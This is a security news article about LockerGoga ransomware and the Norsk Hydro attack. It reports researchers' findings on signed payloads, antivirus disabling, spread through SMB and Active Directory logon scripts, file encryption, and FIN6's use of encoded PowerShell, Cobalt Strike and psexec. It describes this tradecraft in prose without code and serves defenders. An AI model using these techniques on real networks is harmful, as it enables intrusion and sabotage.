LockerGoga: It's not all about the ransom

Updated: In some cases, LockerGoga makes it very difficult to pay blackmail demands to decrypt systems.

Hacking scheme to steal university research for military applications traced back to China Prominent names feature on the hacking list.

Variants of LockerGoga, a form of ransomware which targets industrial systems, have been discovered in which ransom payments appear to be an afterthought rather than the malware's true purpose.

The malware was recently detected at the heart of an attack taking place against Norsk Hydro. The aluminum producer became infected with a strain of the malware which locked its systems and demanded a ransomware payment; a demand which was not met.

Instead, Norsk Hydro called out for help and Microsoft, among other IT vendors, answered. 

However, the company was still forced to switch to manual processes and could not access customer orders until backups were restored.

LockerGoga is one of many forms of malware in the wild which has attacked industrial systems. Another family of note is Industroyer, malware which ESET says is "specifically designed to attack the power grid" and was responsible for the temporary closure of the power grid in Kiev, Ukraine, in 2016.

According to researchers from the Securonix Threat Research team, LockerGoga variants have provided a glimpse into the malware's capabilities -- as well as some strange programming elements which can make paying a ransom more difficult.

In a blog post on Tuesday, Securonix published a detailed report on the capabilities of LockerGoga strains active today.

The infection vector of LockerGoga has not been verified, but as in many cases of business compromise, it is likely that phishing messages represent the initial stage. The researchers say that Microsoft Word or RTF documents containing embedded, malicious macros are suspected culprits.

Payloads are signed with valid certificates which enable the bypass of traditional security products. The threat actors behind the ransomware use multiple certificate authorities (CAs) to sign the software off -- Alisa Ltd., Kitty Ltd., Sectigo, and Mikl Limited -- and some variants of the malware have been equipped with taskkill capabilities in order to disable antivirus systems. Others, additionally, are able to delete Windows processes.

See also: Georgia Tech reveals data breach, 1.3 million records exposed

Once a system is infected with LockerGoga, some variants will move the payload around networks using the Microsoft Server Message Block (SMB) protocol, while others have been observed using Active Directory management services for the same purposes.

"The most likely attack progression [is] that an initial compromise was followed by manual operator placement and modification of one of the existing logon script entries in the Netlogon directory on an AD resource [...], which allowed the binary to
automatically propagate and be executed by users within the organization during a logon session," Securonix says. "It is also possible that the threat actors created a new logon script and added a new logon GPO entry to execute the binary on all of the systems applying the logon script to the organizational unit or the complete organization."

Anti virtual machine (VM) and sandbox evasion techniques, albeit primitive ones, are also in play.

The malware then begins its work. LockerGoga focuses on encrypting files with popular extensions including .doc, .xml, .ppt, and .pdf using AES-256 keys. The extension *.LOCKED is used.

The main thrust of the malware is to infect and encrypt. However, some LockerGoga variants have an odd quirk which can make it harder for victims to pay their ransom demand.

In some strains, the malware will change administrator passwords and log victims off their system using logoff.exe.

"This indicates that the attackers objectives' may have included additional goals that are not part of a traditional ransomware modus operandi, such as cybersabotage," the team says.

TechRepublic: How to use SSH as a VPN with sshuttle

Taking down core, critical services can have catastrophic real-world consequences, and such disruption can be a tempting lure for threat actors. It seems that in LockerGoga's case, we are likely to see more examples of the malware in the wild given FIN6's decision to start deploying both Ryuk and LockerGoga ransomware strains on the networks of compromised companies.

CNET: Wyze Cam's new friend: The $20 Wyze Sense security kit

Oleg Kolesnikov, Director of Threat Research at Securonix told ZDNet:

"One of the reasons that LockerGoga was so impactful in the Norsk Hydro attack was its scale. It infected multiple systems through copying to the shared directory and subsequent lateral movement, affecting the entire organization. 

This lateral movement is a technique that hasn't been used commonly in other attacks so it's not something that companies are used to detecting for, but should be included in protocols for future detection."

Update 14.17 BST:

"I believe the threat actors that deploy LockerGoga are financially motivated but have been more disruptive lately, likely in an effort to make victims feel like they have no better option but to pay," Charles Carmakal, VP of Mandiant, told ZDNet. "I know many organizations that pay threat actors. Unfortunately sometimes the more chaotic the intrusion, the more vulnerable victims feel."

In addition, Carmakal described two FIN6-related intrusions taking place earlier this year. In one case, the hackers were booted out of their target system within two hours, and Mandiant believes that given the opportunity, the group would have dropped LockerGoga. In another, the cybersecurity firm was called in after FIN6 managed to drop the malware.

FIN6 used PowerShell commands and a Cobalt Strike httpsstager in these cases to infiltrate the networks. The group has added both Ryuk and lockerGoga to their itinerary. 

"FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems," Mandiant said. "The attacker made use of Cobalt Strike's "psexec" lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com."

In some environments, LockerGoga appears to spread through a series of batch scripts which stopped services, copied the ransomware, and executed it remotely using psexec.

Previous and related coverage